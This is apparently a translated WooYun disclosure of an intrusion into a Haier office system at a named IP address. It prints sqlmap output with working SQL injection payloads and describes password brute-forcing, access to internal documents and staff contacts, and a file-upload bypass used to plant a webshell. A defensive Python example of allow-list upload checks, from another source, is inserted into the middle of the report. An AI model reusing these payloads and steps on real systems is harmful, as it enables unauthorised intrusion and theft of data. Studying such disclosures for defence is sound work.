
Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0107460

Title: Haier: getshell on the office system of one of its projects (data leakage & threat to the internal network)

Related vendor: Haier Group

Author: jianFen

Submitted: 2015-04-12 21:42

Fix time: 2015-04-17 21:44

Disclosed: 2015-04-17 21:44

Type: successful intrusion

Severity: High

Self-assessed Rank: 20

Status: vendor has been notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:

Bookmarked by 4


Vulnerability details

Disclosure status:

2015-04-12: details sent to the vendor, awaiting vendor handling
2015-04-17: vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

fen

Detailed description:

http://123.234.41.55/
The username field is injectable, but entering an arbitrary password does not get you into the system, so the two are probably checked separately.
It automatically reads a random username; as long as the password matches the username it logs in automatically, so brute-forcing and guessing are enough.

1.PNG


First, the injection (#1)

[root@Hacker~]# Sqlmap -u "123.234.41.55" --data "txtName=aaaa"
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not responsible
for any misuse or damage caused by this program
[*] starting at 12:58:34
[12:58:34] [INFO] parsing HTTP request from '1.txt'
[12:58:35] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txtName
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=JhXV2AWIfuIGktA8ofkpb5
PvPwbvt8S7rEEtXXZOl7jS1l7vP1WXzueKa4qzEXloT2HwIEPsngDD1MquUnr6VZ10P/ImR1NHPex07
IwRKniwTnE/TtuZLMqHrnV7ehw6dtzgvNj+z8ldpXPdyd2iE9L/SQmSsvFMF6Y/eCJuw=&__VIEWSTA
EGENERATOR=C2EE9ABB&__EVENTVALIDATION=s4hmTU/mT7FbzKebJAWsxORyZ9Nh1GWPT5/4MJDnT
pTX++/Y4nS+4siOYMZ8tFpcBAwbKga4N9rFcuqdOjZgpFfy7mJguofK49tnbm+QD1a1nHOhnita7Mri
Igbb/za7VB/8M03ZF4aIxqVe9jXDFB9GHAvctojg+8WwHPz5InGL293mf7QqpSQwTQy4X2xDugYuW4x
7EL7NWPQYxGA==&txtName=aaaa%' AND 5875=5875 AND '%'='&txtPwd=aaaaaa&txtCode=krp
&bthLogin.x=64&bthLogin.y=10
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=JhXV2AWIfuIGktA8ofkpb5
PvPwbvt8S7rEEtXXZOl7jS1l7vP1WXzueKa4qzEXloT2HwIEPsngDD1MquUnr6VZ10P/ImR1NHPex07
IwRKniwTnE/TtuZLMqHrnV7ehw6dtzgvNj+z8ldpXPdyd2iE9L/SQmSsvFMF6Y/eCJuw=&__VIEWSTA
EGENERATOR=C2EE9ABB&__EVENTVALIDATION=s4hmTU/mT7FbzKebJAWsxORyZ9Nh1GWPT5/4MJDnT
pTX++/Y4nS+4siOYMZ8tFpcBAwbKga4N9rFcuqdOjZgpFfy7mJguofK49tnbm+QD1a1nHOhnita7Mri
Igbb/za7VB/8M03ZF4aIxqVe9jXDFB9GHAvctojg+8WwHPz5InGL293mf7QqpSQwTQy4X2xDugYuW4x
7EL7NWPQYxGA==&txtName=aaaa%'; WAITFOR DELAY '0:0:5';--&txtPwd=aaaaaa&txtCode=k
pi&bthLogin.x=64&bthLogin.y=10
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=JhXV2AWIfuIGktA8ofkpb5
PvPwbvt8S7rEEtXXZOl7jS1l7vP1WXzueKa4qzEXloT2HwIEPsngDD1MquUnr6VZ10P/ImR1NHPex07
IwRKniwTnE/TtuZLMqHrnV7ehw6dtzgvNj+z8ldpXPdyd2iE9L/SQmSsvFMF6Y/eCJuw=&__VIEWSTA
EGENERATOR=C2EE9ABB&__EVENTVALIDATION=s4hmTU/mT7FbzKebJAWsxORyZ9Nh1GWPT5/4MJDnT
pTX++/Y4nS+4siOYMZ8tFpcBAwbKga4N9rFcuqdOjZgpFfy7mJguofK49tnbm+QD1a1nHOhnita7Mri
Igbb/za7VB/8M03ZF4aIxqVe9jXDFB9GHAvctojg+8WwHPz5InGL293mf7QqpSQwTQy4X2xDugYuW4x
7EL7NWPQYxGA==&txtName=aaaa%' WAITFOR DELAY '0:0:5'--&txtPwd=aaaaaa&txtCode=krp
&bthLogin.x=64&bthLogin.y=10
---
[12:58:35] [INFO] testing MySQL
[12:58:35] [WARNING] the back-end DBMS is not MySQL
[12:58:35] [INFO] testing Oracle
[12:58:35] [WARNING] the back-end DBMS is not Oracle
[12:58:35] [INFO] testing PostgreSQL
[12:58:35] [WARNING] the back-end DBMS is not PostgreSQL
[12:58:35] [INFO] testing Microsoft SQL Server
[12:58:36] [INFO] confirming Microsoft SQL Server
[12:58:37] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2000
[12:58:37] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 2 times
[12:58:37] [WARNING] cannot properly display Unicode characters inside Windows OS
command prompt (http://bugs.python.org/issue1602). All unhandled occurances will
result in replacement with '?' character. Please, find proper character representation
inside corresponding output files.
[12:58:37] [INFO] fetched data logged to text files under 'F:\1937CN~1\VStart50
tools\????\SQLMAP~2\Bin\output\123.234.41.55'
[*] shutting down at 12:58:37
[root@Hacker~]# Sqlmap


Injection confirmed
#2 Brute-force the password

4.PNG


After logging in, have a look at the privileges. This is a high-privilege account brute-forced later on.
Approving leave requests, ha

3.PNG


All sorts of internal meeting, technical and core materials

5.PNG


Internal staff contact details

2.PNG


#3 getshell
"My work plan": once an entry is created, replies can be posted to it
Arbitrary file upload: .asp is blocked, yet .aspx is not
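The ".asp blocked, .aspx not" behaviour above is the signature of a deny-list filter: anything the list forgot is accepted. As an added example (not code from the report or from the affected system), the block below puts such a deny-list check beside an allow-list check that validates the whole file name and only accepts document and image types, and derives a random storage name so the client-chosen name never reaches the filesystem. The extension sets and the file names are constructed; that the original filter was extension-based is an assumption.

```python
import os
import re
import secrets

# Constructed configuration (assumption): the filter is modelled as a deny-list
# of script extensions, the kind of check that rejects .asp yet passes .aspx.
DENIED_EXTENSIONS = {".asp", ".php", ".jsp"}

# Hardened variant: an allow-list of the document/image types a work-plan reply
# actually needs, matched against a strictly validated file name.
ALLOWED_EXTENSIONS = {".doc", ".docx", ".xls", ".xlsx", ".pdf", ".png", ".jpg"}
SAFE_NAME = re.compile(r"[a-z0-9_-]{1,64}\.[a-z0-9]{1,5}")


def upload_allowed_denylist(filename: str) -> bool:
    """Deny-list check: anything not explicitly listed passes, so every
    server-side type the list forgot (.aspx here) is accepted."""
    ext = os.path.splitext(filename)[1].lower()
    return ext not in DENIED_EXTENSIONS


def _bare_name(filename: str) -> str:
    # Strip any directory part (either separator style) and normalise case.
    return os.path.basename(filename.replace("\\", "/")).lower()


def upload_allowed_allowlist(filename: str) -> bool:
    """Allow-list check on the bare file name: one base name, one extension,
    only characters from a small safe set, and the extension must be listed."""
    base = _bare_name(filename)
    if not SAFE_NAME.fullmatch(base):
        return False  # rejects "plan.docx.aspx", "a;b.jpg", empty names, ...
    return os.path.splitext(base)[1] in ALLOWED_EXTENSIONS


def storage_name(filename: str) -> str:
    """Name to store an accepted upload under: a random token plus the
    validated extension. Raises ValueError for names the allow-list rejects."""
    if not upload_allowed_allowlist(filename):
        raise ValueError("file type not permitted")
    return secrets.token_hex(16) + os.path.splitext(_bare_name(filename))[1]


if __name__ == "__main__":
    for name in ("plan.asp", "plan.aspx", "plan.docx", "plan.docx.aspx"):
        print(f"{name:16} deny-list: {upload_allowed_denylist(name)!s:5} "
              f"allow-list: {upload_allowed_allowlist(name)}")
    print(storage_name("report.pdf"))
```

The storage directory should additionally sit outside the web root (or be served with script execution disabled), so that even a mis-classified file is returned as static content rather than executed by the application server.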

6.PNG


One-liner webshell

7.PNG


Threat to the internal network; didn't bother with the 2008 server - -

8.PNG


Proof of vulnerability:

7.PNG


8.PNG

Fix recommendation:

The back-end SQL injection, and the weak passwords used by users

Copyright notice: when reposting, please credit jianFen@WooYun


Vulnerability response

Vendor response:

Severity: no impact, vendor ignored

Ignored on: 2015-04-17 21:44

Vendor reply:

Vulnerability Rank: 15 (WooYun rating)

Latest status:

None yet

